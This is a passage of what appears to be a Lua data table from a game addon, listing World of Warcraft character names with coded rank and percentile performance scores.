["Ceoofwater"] = "LT:767/97%SB:851/99%SM:1000/99%",
["Hillaryswank"] = "LT:773/97%LB:653/96%EM:800/84%",
["Vhalx"] = "ST:827/99%SB:834/99%SM:1006/99%",
["Firatha"] = "ET:736/94%SB:776/99%LM:915/98%",
["Ashtrey"] = "ET:651/84%EB:714/90%EM:869/89%",
["Meatcleave"] = "ET:714/92%LB:770/97%LM:913/95%",
["Dotbot"] = "LT:778/98%SB:813/99%SM:1052/99%",
["Livetogrief"] = "EB:718/91%EM:928/94%",
["Volibearr"] = "ET:612/81%EB:612/94%EM:456/79%",
["Oldoldold"] = "ET:732/89%LB:581/95%LM:944/96%",
["Baldmeow"] = "RT:544/69%EB:625/88%EM:768/87%",
["Cblue"] = "ET:724/88%EB:687/92%EM:891/94%",
["Garybuce"] = "ET:316/80%EB:713/94%EM:728/81%",
["Merciful"] = "UT:88/27%EB:645/89%EM:814/88%",
["Lilcoco"] = "ET:403/90%EB:663/91%EM:874/93%",
["Cope"] = "LB:738/96%LM:956/97%",
["Soolsa"] = "ET:441/92%EB:623/86%EM:790/85%",
["Brionnan"] = "RT:537/68%EB:683/93%EM:770/84%",
["Bandofhawk"] = "ET:420/92%EB:711/94%LM:889/95%",
["Tokitotem"] = "ET:638/79%LB:629/97%EM:825/88%",
["Beefchurch"] = "ET:450/93%EB:597/83%EM:896/94%",
["Dimmondback"] = "ET:686/84%EB:548/93%EM:677/93%",
["Shammertime"] = "EB:684/91%EM:831/90%",
["Docthesavage"] = "UT:94/29%EB:642/88%EM:830/89%",
["Shnofner"] = "LT:818/96%LB:754/97%LM:961/98%",
["Peligroso"] = "ET:707/86%EB:688/92%EM:886/94%",
["Omeggared"] = "RT:400/50%LB:586/95%EM:589/89%",
["Dankbinder"] = "ET:753/91%LB:748/96%LM:951/97%",
["Mmilktea"] = "LB:716/95%EM:757/83%",
["Bustedlol"] = "EB:632/88%EM:649/75%",
["Nastybroo"] = "ET:606/75%EB:723/94%EM:909/94%",
["Worshaka"] = "ET:397/90%EB:504/91%EM:680/93%",
["Resto"] = "LT:540/96%LB:746/97%LM:958/98%",
["Mercyfoo"] = "ET:628/79%LB:559/95%EM:850/91%",
["Iamawake"] = "UT:296/39%LB:665/98%EM:852/90%",
["Alalula"] = "RT:188/57%EB:636/89%UM:305/31%",
["Ooroo"] = "RT:269/73%EB:582/80%EM:839/89%",
["Wingey"] = "RT:236/68%EB:554/77%RM:543/64%",
["Khaleessii"] = "ET:602/76%RB:477/68%EM:788/86%",
["Alarielle"] = "LT:764/98%SB:793/99%SM:1044/99%",
["Qbert"] = "LT:513/95%EB:534/92%EM:654/92%",
["Lazker"] = "UT:339/41%LB:766/98%EM:861/90%",
["Gabrielle"] = "CT:36/6%EB:471/88%LM:897/95%",
["Anechoic"] = "ST:751/99%SB:683/99%LM:950/97%",
["Ashori"] = "ET:682/86%LB:764/98%SM:977/99%",
["Hiereus"] = "RT:490/62%EB:511/92%EM:783/88%",
["Fashionovia"] = "ET:437/92%EB:681/93%RM:590/65%",
["Capdcolon"] = "ET:727/89%EB:663/92%UM:154/41%",
["Fallengeorge"] = "ET:763/93%LB:744/97%EM:461/81%",
["Brosean"] = "RT:240/71%EB:675/92%EM:834/89%",
["Ravensclaw"] = "RT:270/74%EB:594/84%EM:848/91%",
["Haddict"] = "ET:769/92%LB:631/97%EM:847/91%",
["Berronarts"] = "ET:600/76%EB:691/94%LM:905/96%",
["Bawbles"] = "UT:237/28%EB:584/82%EM:791/88%",
["Zuluku"] = "UT:132/41%EB:612/85%EM:736/80%",
["Chogirth"] = "ET:349/84%LB:734/95%EM:869/90%",
["Mykells"] = "ET:580/75%EB:691/93%EM:822/88%",
["Skidbladnir"] = "ET:601/77%LB:723/96%EM:706/80%",
["Harrowblade"] = "LT:841/97%LB:658/98%EM:754/82%",
["Totembaker"] = "ET:754/91%EB:703/93%EM:821/89%",
["Chong"] = "ET:339/83%EB:665/89%EM:826/88%",
["Pandagirl"] = "EB:608/84%EM:848/91%",
["Sanpachidah"] = "ET:779/93%EB:663/90%EM:852/92%",
["Mykel"] = "LT:772/97%SB:786/99%LM:823/96%",
["Crosszone"] = "ST:811/99%SB:801/99%LM:970/98%",
["Xankul"] = "LT:789/98%SB:766/99%LM:981/98%",
["Difficultery"] = "LT:751/95%LB:787/98%LM:957/97%",
["Rumeboy"] = "ST:831/99%LB:796/98%SM:990/99%",
["Dvss"] = "ET:742/94%LB:762/95%SM:1012/99%",
["Slurm"] = "LT:782/98%LB:792/98%SM:1006/99%",
["Quantus"] = "LT:771/97%SB:781/99%SM:890/99%",
["Xiaolonnu"] = "ET:723/93%LB:695/97%EM:701/77%",
["Csawyer"] = "LT:744/95%SB:811/99%LM:776/97%",
["Freakyfrost"] = "ET:726/93%EB:619/86%EM:653/76%",
["Impose"] = "ST:830/99%SB:833/99%SM:1012/99%",
["Snickercakes"] = "LT:769/97%LB:763/97%LM:961/98%",
["Cannigtr"] = "ST:793/99%SB:799/99%SM:996/99%",
["Hkay"] = "LT:784/98%SB:805/99%LM:958/97%",
["Ööoöö"] = "ET:714/92%SB:803/99%LM:992/98%",
["Sszeth"] = "ST:728/99%LB:730/98%LM:975/98%",
["Guldanknìght"] = "LT:787/98%LB:778/97%EM:926/94%",
["Getranked"] = "ET:723/93%LB:737/98%LM:942/96%",
["Shrad"] = "LT:754/96%SB:783/99%LM:965/97%",
["Achilles"] = "ET:663/90%SB:810/99%SM:1017/99%",
["Auditore"] = "ET:712/92%EB:741/94%EM:887/94%",
["Bizrip"] = "ET:714/92%EB:665/89%EM:753/81%",
["Gendrconfusd"] = "LT:775/97%SB:812/99%SM:953/99%",
["Doolay"] = "ST:783/99%SB:845/99%LM:977/98%",
["Alternosfera"] = "LT:774/97%LB:774/98%LM:871/95%",
["Nott"] = "ST:815/99%SB:849/99%SM:1009/99%",
["Tacty"] = "LT:768/97%LB:732/98%EM:754/94%",
["Yeshue"] = "LT:746/95%EB:548/94%EM:765/82%",
["Vatano"] = "LT:783/98%SB:790/99%LM:985/98%",
["Blackicefire"] = "LT:761/96%LB:778/97%EM:918/94%",
["Dreamrx"] = "LT:769/97%LB:745/97%EM:802/90%",
["Belmogodx"] = "LT:770/97%LB:659/97%LM:961/97%",
["Tbobaggins"] = "LT:771/97%LB:758/97%RM:623/72%",
["Glimfolkor"] = "LT:769/97%LB:797/98%SM:1034/99%",
["Zapus"] = "LT:783/98%SB:789/99%LM:936/96%",
["Legdribble"] = "ST:800/99%SB:734/99%EM:869/91%",
["Aguaslave"] = "LT:781/98%LB:777/97%SM:999/99%",
["Caspa"] = "ET:724/92%LB:746/98%EM:802/83%",
["Njuwqcs"] = "ET:695/90%EB:503/90%EM:777/83%",
["Oldwanggege"] = "LT:784/98%SB:844/99%LM:936/96%",
["Falkkon"] = "LT:775/97%LB:781/98%SM:1008/99%",
["Gertbfrobe"] = "LT:763/96%LB:762/96%EM:901/92%",
["Thraknar"] = "ST:812/99%LB:776/97%LM:957/96%",
["Sittinbull"] = "LT:755/96%LB:758/96%LM:954/97%",
["Olõrin"] = "LT:779/98%LB:762/98%LM:769/97%",
["Piptendo"] = "ET:716/91%LB:657/96%EM:775/81%",
["Chiu"] = "LT:757/96%EB:725/92%RM:528/60%",
["Cmg"] = "LT:487/96%EB:722/92%LM:959/97%",
["Thatsit"] = "ET:690/90%LB:730/96%EM:567/88%",
["Petrikhor"] = "ST:823/99%SB:827/99%LM:987/98%",
["Ktmage"] = "ET:732/94%EB:735/93%LM:889/96%",
["Yvonka"] = "LT:782/98%LB:797/98%LM:933/95%",
["Khors"] = "ET:701/91%LB:779/97%LM:971/98%",
["Pokmaige"] = "ET:406/93%EB:662/86%EM:820/87%",
["Fruitpunch"] = "LT:769/97%LB:764/96%EM:912/93%",
["Xurr"] = "LT:783/98%LB:776/97%LM:951/98%",
["Meso"] = "RT:572/73%EB:546/78%RM:319/66%",
["Smartbean"] = "UT:296/36%EB:362/77%UM:164/43%",
["Outu"] = "ET:718/87%EB:654/89%EM:787/86%",
["Oldshushu"] = "ET:625/80%EB:677/92%EM:792/85%",
["Tsukie"] = "ET:633/81%EB:591/81%LM:920/95%",
["Gighealz"] = "RT:551/69%EB:547/94%RM:579/68%",
["Brëezy"] = "ET:720/89%EB:663/91%RM:490/57%",
["Loveandwar"] = "RT:430/54%RB:504/72%EM:713/78%",
["Heliopause"] = "RT:538/68%UB:346/46%EM:508/84%",
["Akai"] = "LT:670/98%EB:623/87%EM:765/83%",
["Softnchewy"] = "LT:581/97%EB:531/75%",
["Kuuonn"] = "ET:702/87%LB:734/97%EM:847/90%",
["Loeloe"] = "ET:630/80%EB:595/83%RM:609/67%",
["Swiftmd"] = "ET:730/90%LB:733/96%LM:944/97%",
["Glare"] = "RT:452/57%RB:369/52%EM:701/77%",
["Freshknight"] = "ET:721/89%EB:573/81%EM:730/82%",
["Valemir"] = "ET:760/92%EB:623/86%EM:705/78%",
["Holylighte"] = "ET:619/79%EB:435/84%LM:930/96%",
["Savedurlife"] = "RT:581/73%UB:276/36%RM:614/68%",
["Slok"] = "ET:660/81%EB:681/91%EM:892/93%",
["Zonk"] = "ET:756/91%SB:786/99%LM:924/95%",
["Nibbit"] = "LT:554/97%LB:766/98%LM:926/96%",
["Despazito"] = "ET:715/87%EB:661/90%EM:638/91%",
["Fadedman"] = "RT:591/74%EB:641/88%LM:731/95%",
["Stanleyms"] = "ST:806/99%SB:802/99%LM:959/98%",
["Ruima"] = "RT:582/74%EB:694/94%EM:804/87%",
["Soulcartel"] = "LT:561/97%EB:525/92%LM:946/97%",
["Spuck"] = "RT:582/73%LB:600/96%EM:771/87%",
["Suop"] = "ET:688/86%EB:592/82%EM:855/91%",
["Anago"] = "ET:422/91%LB:700/95%EM:783/85%",
["Beefjezos"] = "ET:672/84%EB:700/93%LM:916/95%",
["Captncrunch"] = "ST:723/99%LB:657/97%LM:952/97%",
["Dubber"] = "ET:644/80%LB:751/97%LM:931/96%",
["Archãngel"] = "RT:516/65%EB:575/80%LM:928/96%",
["Diosmio"] = "ET:601/77%EB:668/90%EM:877/94%",
["Shaebudder"] = "RT:404/50%EB:574/82%RM:611/71%",
["Akraen"] = "ET:795/94%LB:728/95%SM:984/99%",
["Thunderhorns"] = "ET:734/89%LB:622/96%LM:776/96%",
["Wildhealer"] = "ET:655/82%LB:750/98%LM:913/95%",
["Phthaloblue"] = "ET:370/86%EB:692/92%EM:874/91%",
["Gokun"] = "ET:671/84%EB:629/87%EM:879/94%",
["Wireless"] = "RT:588/74%EB:510/91%EM:672/93%",
["Posh"] = "ET:664/84%EB:660/90%EM:789/87%",
["Hurivi"] = "ET:403/90%LB:760/97%LM:981/98%",
["Thunderbraid"] = "RT:157/52%RB:516/73%EM:705/79%",
["Hashmire"] = "UT:366/45%RB:299/65%RM:649/71%",
["Monckom"] = "ET:732/89%EB:684/92%EM:770/86%",
["Illandra"] = "LT:812/95%LB:734/96%LM:902/95%",
["Cptwobbles"] = "ET:381/89%EB:711/94%EM:844/90%",
["Kongbutea"] = "ET:659/83%EB:524/92%EM:593/89%",
["Preachr"] = "ET:640/81%EB:633/88%RM:617/70%",
["Stanleymoo"] = "LT:588/97%SB:718/99%LM:920/96%",
["Ajsoprano"] = "ET:639/81%EB:712/94%SM:983/99%",
["Laoda"] = "ET:796/94%EB:701/93%EM:832/91%",
["Deadlygrrl"] = "LT:586/97%EB:533/93%EM:453/79%",
["Raijyu"] = "RT:478/61%EB:677/91%EM:852/90%",
["Midgey"] = "ET:712/91%LB:717/98%EM:678/86%",
["Corri"] = "LT:665/98%LB:707/97%LM:829/97%",
["Bullshentski"] = "RT:202/69%LB:776/97%LM:981/98%",
["Midnightbbq"] = "ET:720/92%EB:738/93%",
["Ravfour"] = "LT:460/95%LB:756/95%EM:746/93%",
["Shermlock"] = "ET:730/93%SB:808/99%SM:928/99%",
["Rhorix"] = "ET:674/88%EB:543/90%EM:743/80%",
["Manoils"] = "LT:763/96%LB:765/96%LM:850/97%",
["Slynkie"] = "LT:771/97%SB:801/99%SM:1031/99%",
["Guttermouth"] = "LT:754/95%LB:687/97%EM:879/90%",
["Swoopdz"] = "ST:762/99%SB:769/99%SM:858/99%",
["Danigan"] = "UT:130/49%EB:681/87%EM:889/91%",
["Thehuman"] = "UT:344/48%EB:736/92%LM:937/95%",
["Thunderhorse"] = "ET:693/90%EB:748/94%LM:934/95%",
["Ihayabusa"] = "LT:777/97%EB:732/92%EM:736/77%",
["Dray"] = "LT:752/95%EB:728/94%LM:923/95%",
["Dotz"] = "RT:201/66%EB:709/90%EM:814/84%",
["Graysen"] = "ET:680/88%LB:684/97%CM:145/18%",
["Pianomeow"] = "ET:345/90%EB:722/91%EM:797/91%",
["Phirthulu"] = "LT:783/98%SB:810/99%LM:935/95%",
["Anheuser"] = "ET:627/83%EB:588/93%LM:891/98%",
["Milkmeslow"] = "ET:692/89%EB:707/90%EM:701/92%",
["Palach"] = "LT:431/95%EB:611/94%EM:829/86%",
["Brigeeta"] = "ET:715/92%EB:745/94%LM:956/97%",
["Savvay"] = "ST:818/99%SB:831/99%SM:987/99%",
["Abuubuu"] = "ET:737/94%LB:705/97%EM:891/92%",
["Agamemnon"] = "ET:613/86%LB:767/97%LM:917/95%",
["Jugganaughty"] = "ET:594/79%EB:732/92%EM:788/84%",
["Awfulwaffles"] = "ET:677/87%LB:697/97%EM:922/94%",
["Iamddga"] = "LT:472/95%LB:660/96%LM:789/95%",
["Xork"] = "UT:101/40%EB:704/89%EM:735/94%",
["Alternate"] = "ET:719/92%LB:761/96%LM:835/96%",
["Jînx"] = "RT:442/58%EB:706/90%RM:610/67%",
["Sevenmeteren"] = "ET:675/88%LB:677/96%EM:647/90%",
["Coldrus"] = "ET:659/85%LB:761/96%RM:587/65%",
["Drosul"] = "ST:776/99%SB:806/99%LM:944/96%",
["Liamneeson"] = "UT:310/40%EB:690/88%EM:804/83%",
["Nle"] = "EB:701/89%EM:766/80%",
["Goochie"] = "ET:699/90%LB:763/96%EM:887/92%",
["Corner"] = "ET:711/91%LB:777/97%EM:802/86%",
["Corenn"] = "LT:754/96%SB:810/99%SM:1013/99%",
["Zerohour"] = "RT:548/72%EB:672/86%RM:356/68%",
["Majinboo"] = "ET:688/89%LB:756/95%LM:968/97%",
["Mate"] = "ET:656/85%LB:763/96%EM:900/93%",
["Pepetequila"] = "ET:644/84%EB:723/92%EM:926/94%",
["Michael"] = "LT:657/98%LB:675/96%LM:939/95%",
["Fluux"] = "LT:757/96%SB:824/99%EM:888/92%",
["Galrond"] = "LT:748/95%SB:839/99%SM:1008/99%",
["Vroga"] = "LT:778/98%EB:724/92%EM:930/94%",
["Chopstick"] = "ET:553/81%SB:809/99%LM:920/97%",
["Azog"] = "ET:673/88%EB:745/94%LM:919/95%",
["Wreckcage"] = "ET:714/91%EB:737/93%EM:892/92%",
["Cotillion"] = "UT:239/31%LB:767/96%LM:971/97%",
["Poofbyebye"] = "ET:624/82%EB:707/90%EM:801/83%",
["Aquablu"] = "ET:742/94%EB:745/94%EM:890/91%",
["Sugarblade"] = "EB:719/91%EM:892/91%",
["Casualmage"] = "LT:452/95%SB:812/99%LM:973/98%",
["Philen"] = "UT:107/42%EB:749/94%EM:904/93%",
["Pandakeeper"] = "ET:692/89%EB:724/91%EM:805/84%",
["Delly"] = "ET:352/91%EB:738/93%EM:914/93%",
["Áces"] = "RT:217/70%EB:547/91%EM:894/91%",
["Rella"] = "ET:642/89%EB:689/88%EM:842/87%",
["Leej"] = "ET:575/77%EB:558/91%EM:833/86%",
["Flowki"] = "UT:88/35%EB:732/94%EM:692/87%",
["Warmari"] = "RT:136/51%EB:731/92%EM:882/91%",
["Coy"] = "RT:408/54%EB:732/93%EM:908/94%",
["Acipere"] = "ET:653/85%LB:766/96%SM:1010/99%",
["Kunjara"] = "ET:585/75%LB:707/95%LM:938/97%",
["Tyraeel"] = "ET:428/92%EB:704/94%EM:887/93%",
["Beefisto"] = "ET:395/89%EB:684/91%EM:832/88%",
["Djsdruid"] = "LT:831/96%LB:750/97%LM:974/98%",
["Kunkun"] = "RT:95/54%EB:457/87%EM:800/89%",
["Neoneonee"] = "RT:542/70%EB:605/85%RM:518/60%",
["Baylan"] = "ET:716/87%EB:627/86%EM:755/82%",
["Christiene"] = "UT:142/48%EB:684/93%LM:947/97%",
["Papapriest"] = "LT:494/95%EB:570/82%EM:573/88%",
["Karak"] = "RT:453/59%EB:671/91%EM:805/87%",
["Momoattack"] = "ET:286/76%EB:670/89%EM:881/92%",
["Disana"] = "LB:663/98%LM:904/96%",
["Marduk"] = "LT:643/98%SB:740/99%EM:893/93%",
["Warsongswind"] = "ET:773/93%LB:631/97%LM:949/97%",
["Villalobos"] = "ET:441/94%EB:698/93%LM:752/96%",
["Tiezen"] = "RT:176/55%LB:651/98%EM:745/81%",
["Invincîbull"] = "RT:575/74%EB:651/89%EM:849/92%",
["Thundurusx"] = "LT:856/98%LB:760/97%LM:958/98%",
["Weyuzc"] = "ET:742/90%LB:611/97%LM:941/97%",
["Squirrtle"] = "RT:245/70%RB:507/73%",
["Unequaled"] = "LT:616/98%LB:721/96%EM:879/93%",
["Xaintt"] = "EB:652/89%EM:891/93%",
["Kyana"] = "RT:170/53%EB:603/86%EM:743/81%",
["Tallom"] = "RT:225/68%EB:705/94%LM:930/96%",
["Runwayseven"] = "RT:464/60%RB:455/66%RM:440/62%",
["Ccie"] = "RT:216/64%EB:600/85%EM:685/83%",
["Noa"] = "LT:814/95%LB:754/97%LM:937/96%",
["Lanthin"] = "ET:625/79%LB:588/96%LM:902/95%",
["Dasishaman"] = "ET:450/93%LB:754/97%EM:868/93%",
["Senti"] = "ET:508/83%EB:690/91%EM:867/91%",
["Poolday"] = "ET:610/78%EB:552/94%LM:925/97%",
["Tauronto"] = "LT:840/97%LB:639/98%LM:939/96%",
["Ebayz"] = "ET:725/89%EB:554/94%EM:775/87%",
["Curie"] = "ET:370/87%EB:501/91%EM:784/85%",
["Dubmace"] = "EB:612/85%EM:847/92%",
["Lujuria"] = "RT:253/71%EB:648/90%EM:665/92%",
["Benhur"] = "EB:576/79%EM:747/81%",
["Boofslayer"] = "EB:596/85%EM:730/84%",
["Kaypee"] = "LT:495/95%LB:739/97%EM:860/91%",
["Durfo"] = "ET:276/77%LB:752/98%EM:875/92%",
["Fatbull"] = "ET:729/88%LB:727/95%EM:878/94%",
["Shampane"] = "RT:568/73%EB:646/88%EM:810/86%",
["Bpockets"] = "EB:558/81%EM:691/80%",
["Webarebear"] = "ET:703/87%LB:714/95%EM:654/75%",
["Alphalaxer"] = "UT:220/25%EB:649/89%EM:837/91%",
["Shakku"] = "ET:665/82%LB:748/96%LM:931/96%",
["Vëndetta"] = "ET:596/79%EB:698/93%EM:905/94%",
["Feetpix"] = "ET:669/84%EB:652/89%EM:790/85%",
["Probs"] = "ET:411/90%EB:603/84%EM:797/85%",
["Karhma"] = "UT:138/43%EB:613/86%EM:815/91%",
["Holywax"] = "LT:589/97%LB:577/95%EM:896/94%",
["Chompus"] = "UT:239/29%RB:536/74%EM:709/78%",
["Aleve"] = "ET:709/87%LB:705/95%EM:752/85%",
["Uglyshambish"] = "RT:275/74%LB:752/97%EM:913/94%",
["Shanrie"] = "EB:625/87%EM:847/90%",
["Zachairi"] = "CT:90/9%EB:549/79%EM:527/85%",
["Mythra"] = "EB:415/84%UM:254/25%",
["Highway"] = "LT:662/98%EB:476/89%EM:713/78%",
["Abx"] = "EB:688/93%LM:934/97%",
["Chillbz"] = "EB:627/86%EM:802/90%",
["Purpskrt"] = "LT:765/97%LB:748/97%LM:960/97%",
["Stopbegging"] = "ET:674/87%EB:743/93%EM:801/83%",
["Blazecore"] = "LT:768/97%SB:805/99%SM:1037/99%",
["Cheater"] = "LT:788/98%LB:783/98%SM:981/99%",
["Nekaix"] = "ET:735/94%EB:733/92%LM:956/97%",
["Indecisivé"] = "ET:739/94%LB:758/97%LM:950/96%",
["Supertoxic"] = "LT:742/95%LB:779/97%EM:932/94%",
["Baldfemsmorc"] = "LT:760/96%EB:726/92%EM:796/85%",
["Dotsqt"] = "LT:776/98%SB:813/99%LM:973/98%",
["Immelman"] = "LT:756/96%LB:758/95%LM:984/98%",
["Vrokar"] = "LT:768/97%LB:774/98%LM:987/98%",
["Gdr"] = "LT:776/97%LB:756/95%EM:856/88%",
["Riddox"] = "ET:708/90%LB:770/96%LM:973/97%",
["Ellpee"] = "LT:752/95%LB:652/96%LM:958/97%",
["Stes"] = "ET:739/94%EB:707/89%SM:1013/99%",
["Stermanator"] = "ET:707/91%LB:769/96%LM:938/95%",
["Overunder"] = "ET:676/89%EB:738/94%EM:841/89%",
["Zoobaedah"] = "ET:735/94%SB:748/99%LM:819/98%",
["Ceryn"] = "LT:772/97%LB:771/96%LM:934/95%",
["Nymira"] = "ST:683/99%SB:755/99%LM:929/95%",
["Rattlebox"] = "LT:770/97%LB:790/98%LM:956/97%",
["Grassmonkey"] = "LT:787/98%SB:852/99%SM:993/99%",
["Nastyoldman"] = "LT:756/96%SB:689/99%LM:948/96%",
["Artyi"] = "ST:810/99%SB:768/99%LM:965/98%",
["Kopie"] = "ET:734/93%LB:643/95%EM:891/91%",
["Aborter"] = "ET:715/92%EB:722/91%EM:879/91%",
["Fmsxscopez"] = "LT:780/98%SB:794/99%LM:989/98%",
["Taylorde"] = "ET:665/86%EB:726/91%EM:895/91%",
["Gz"] = "ST:831/99%LB:781/98%EM:768/94%",
["Juicynthicc"] = "ST:791/99%LB:795/98%LM:914/95%",
["Mutherzugger"] = "ET:737/94%EB:727/92%LM:951/97%",
["Lunchbeast"] = "ST:794/99%SB:806/99%SM:981/99%",
["Moomaul"] = "ET:723/92%LB:738/95%EM:816/91%",
["Drjoo"] = "ST:809/99%SB:842/99%SM:1022/99%",
["Zolaro"] = "ST:827/99%SB:871/99%SM:1065/99%",
["Fo"] = "LT:758/96%LB:732/96%LM:956/97%",
["Shiena"] = "LT:783/98%LB:757/95%SM:997/99%",
["Tygore"] = "ST:834/99%SB:899/99%SM:1130/99%",
["Lars"] = "ST:816/99%SB:811/99%LM:965/97%",
["Fleeson"] = "ET:642/85%EB:697/90%EM:791/84%",
["Idybitz"] = "ST:810/99%LB:791/98%LM:988/98%",
["Mÿstic"] = "ET:739/94%LB:767/96%LM:952/97%",
["Anubìs"] = "LT:759/96%SB:806/99%SM:1024/99%",
["Arth"] = "LT:743/95%LB:768/97%EM:724/77%",
["Phamtom"] = "LT:787/98%LB:789/98%EM:905/93%",
["Steph"] = "LT:781/98%LB:775/97%LM:959/97%",
["Wardelin"] = "LT:751/95%LB:753/95%EM:902/94%",
["Oldasfk"] = "LT:775/97%EB:606/84%EM:722/78%",
["Whitefire"] = "ST:725/99%LB:697/98%LM:968/97%",
["Afkhoot"] = "ET:742/94%EB:735/92%EM:821/87%",
["Burzaa"] = "LT:791/98%SB:830/99%SM:1012/99%",
["Bluefrosty"] = "ST:763/99%SB:801/99%LM:952/97%",
["Ayepickles"] = "LT:773/97%LB:760/95%LM:913/97%",
["Runn"] = "ST:781/99%LB:795/98%LM:968/97%",
["Kizer"] = "ET:727/93%LB:760/96%LM:998/98%",
["Edwing"] = "LT:785/98%LB:671/98%EM:911/94%",
["Shilafi"] = "LT:486/96%LB:761/96%LM:958/97%",
["Haji"] = "ST:826/99%SB:817/99%SM:1053/99%",
["Magicfire"] = "RT:478/65%SB:812/99%LM:985/98%",
["Prophetzul"] = "ET:713/92%LB:762/96%LM:964/97%",
["Executeoner"] = "ET:653/85%EB:736/92%EM:750/79%",
["Aurdinger"] = "ET:693/90%EB:707/93%EM:835/88%",
["Aniles"] = "LT:600/97%EB:598/85%EM:735/84%",
["Hundoproof"] = "ET:713/87%LB:626/96%EM:819/89%",
["Roadheal"] = "ET:686/85%EB:517/92%EM:751/85%",
["Trollypally"] = "ET:654/83%EB:614/86%RM:650/74%",
["Kittendad"] = "RT:540/73%SB:842/99%SM:988/99%",
["Mustydusty"] = "ET:373/89%EB:641/87%EM:845/90%",
["Shamblz"] = "ET:700/85%EB:601/84%EM:816/87%",
["Europe"] = "RT:495/67%RB:397/54%RM:514/56%",
["Anathema"] = "UT:229/27%RB:503/70%EM:774/87%",
["Glados"] = "RT:425/53%EB:571/81%RM:650/72%",
["Linkyy"] = "LT:815/96%EB:479/89%RM:426/51%",
["Gzarina"] = "ET:720/87%EB:653/88%EM:849/89%",
["Shockful"] = "ET:784/93%EB:529/92%EM:814/89%",
["Clarenceheal"] = "ET:792/94%EB:636/87%LM:799/97%",
["Eatprehlove"] = "ET:422/91%EB:643/88%EM:684/75%",
["Umeshu"] = "RT:438/58%EB:698/94%LM:903/95%",
["Leigh"] = "ET:593/76%EB:574/79%EM:719/78%",
["Fufurian"] = "ST:692/99%LB:752/97%LM:952/97%",
["Ailerak"] = "ET:647/84%EB:446/87%RM:517/59%",
["Thundershock"] = "LT:686/98%EB:675/91%LM:930/97%",
["Dinkylady"] = "LT:544/96%EB:576/81%EM:450/79%",
["Shamah"] = "LT:833/96%SB:715/99%EM:885/94%",
["Jacko"] = "ET:650/82%EB:463/88%EM:732/80%",
["Leonrey"] = "ET:630/82%EB:641/87%LM:911/95%",
["Mesa"] = "ET:630/81%EB:618/86%LM:932/97%",
["Floatingrock"] = "RT:533/68%EB:631/87%EM:731/80%",
["Mibbit"] = "ET:629/79%EB:584/83%EM:812/88%",
["Blaziken"] = "ET:746/91%EB:640/88%EM:865/93%",
["Vandinar"] = "RT:499/64%LB:753/98%LM:939/97%",
["Kakki"] = "LT:812/95%EB:581/83%EM:880/93%",
["Xbetrayed"] = "ET:402/89%RB:516/74%EM:684/83%",
["Shawarma"] = "ET:290/76%EB:720/94%LM:925/95%",
["Sanguinaar"] = "RT:506/69%EB:694/94%EM:724/83%",
["Lliraila"] = "ET:353/85%EB:665/92%LM:921/96%",
["Dabrigg"] = "ET:709/87%LB:737/95%LM:918/95%",
["Psuedocheili"] = "RT:267/73%RB:473/65%EM:652/92%",
["Jpmorgan"] = "RT:204/61%EB:563/80%EM:766/84%",
["Newark"] = "ET:405/89%EB:551/93%EM:852/90%",
["Bopthetank"] = "ET:722/89%EB:650/88%EM:852/90%",
["Wangxiatian"] = "LT:518/96%LB:593/96%EM:898/94%",
["Bluerice"] = "ET:610/77%EB:528/92%EM:691/76%",
["Klesk"] = "ET:762/92%EB:664/90%EM:825/90%",
["Hezzabah"] = "RT:405/51%RB:266/61%CM:18/24%",
["Azaz"] = "RT:227/66%EB:668/91%LM:920/96%",
["Beardedhuman"] = "RT:213/64%EB:588/82%LM:916/96%",
["Pcpaladin"] = "ET:558/75%EB:696/93%LM:918/95%",
["Bertdert"] = "UT:234/28%CB:196/24%CM:185/22%",
["Urthy"] = "LT:600/98%EB:544/77%RM:563/62%",
["Phlorisa"] = "LT:520/96%EB:504/91%EM:831/89%",
["Redkildapali"] = "ET:709/88%EB:666/91%EM:840/91%",
["Alemir"] = "RT:177/56%RB:453/62%RM:640/71%",
["Xoheallife"] = "RT:192/60%RB:507/74%EM:676/94%",
["Tism"] = "ST:714/99%LB:662/97%LM:820/97%",
["Chowza"] = "RT:545/69%RB:513/74%EM:679/78%",
["Deepindark"] = "LT:755/96%SB:763/99%LM:947/97%",
["Prisonmíke"] = "ET:659/85%LB:763/96%EM:737/78%",
["Marciomo"] = "LT:638/98%EB:717/90%EM:829/85%",
["Causey"] = "LT:676/98%LB:717/98%LM:935/95%",
["Arkevin"] = "ST:794/99%SB:817/99%SM:989/99%",
["Diving"] = "ET:718/92%LB:769/96%EM:916/93%",
["Wrek"] = "LT:666/98%LB:700/97%EM:926/94%",
["Meerah"] = "ET:570/76%EB:741/93%EM:837/87%",
["Mindright"] = "ET:726/93%LB:775/97%LM:926/95%",
["Earrl"] = "LT:591/97%EB:747/94%LM:938/95%",
["Kierandros"] = "EB:687/88%EM:877/91%",
["Misstantrum"] = "ET:743/94%EB:736/93%LM:941/95%",
["Accasia"] = "ET:683/88%LB:761/95%LM:947/95%",
["Letmaul"] = "LT:657/95%SB:743/99%LM:900/96%",
["Arnym"] = "LB:757/95%LM:933/95%",
["Tora"] = "EB:697/88%LM:957/96%",
["Trollbot"] = "RT:463/72%EB:529/89%LM:958/98%",
["Actionjeff"] = "ET:330/87%LB:635/95%EM:857/88%",
["Kegslayer"] = "LT:772/97%SB:796/99%SM:948/99%",
["Dannyrude"] = "ET:689/89%LB:701/97%LM:924/95%",
["Hyjaz"] = "ST:757/99%SB:802/99%LM:988/98%",
["Mitchius"] = "ST:718/99%SB:758/99%LM:965/98%",
["Bullverize"] = "ST:809/99%SB:824/99%SM:1008/99%",
["Aiz"] = "ET:661/86%LB:705/97%EM:458/79%",
["Falker"] = "ET:567/76%EB:722/91%EM:723/93%",
["Dogtorj"] = "ET:741/94%EB:733/93%LM:928/95%",
["Clutch"] = "ET:736/93%LB:794/98%LM:979/98%",
["Lilsheez"] = "ET:724/92%LB:757/95%LM:963/97%",
["Jope"] = "ET:554/91%SB:761/99%SM:1005/99%",
["Stoutbeard"] = "ET:677/88%EB:738/93%EM:854/90%",
["Blitz"] = "ET:702/90%EB:699/89%EM:845/87%",
["Bricker"] = "RT:205/70%EB:666/85%EM:813/85%",
["Valadeeps"] = "ET:724/92%EB:748/94%EM:917/94%",
["Xiaoyu"] = "ST:788/99%SB:805/99%LM:963/98%",
["Ravishanker"] = "ET:738/94%SB:759/99%LM:826/96%",
["Malcolmx"] = "LT:579/97%LB:726/98%EM:733/93%",
["Drahs"] = "EB:744/93%LM:982/98%",
["Liandrise"] = "RT:518/70%LB:775/97%EM:875/90%",
["Dottyhottie"] = "ST:819/99%LB:792/98%LM:875/98%",
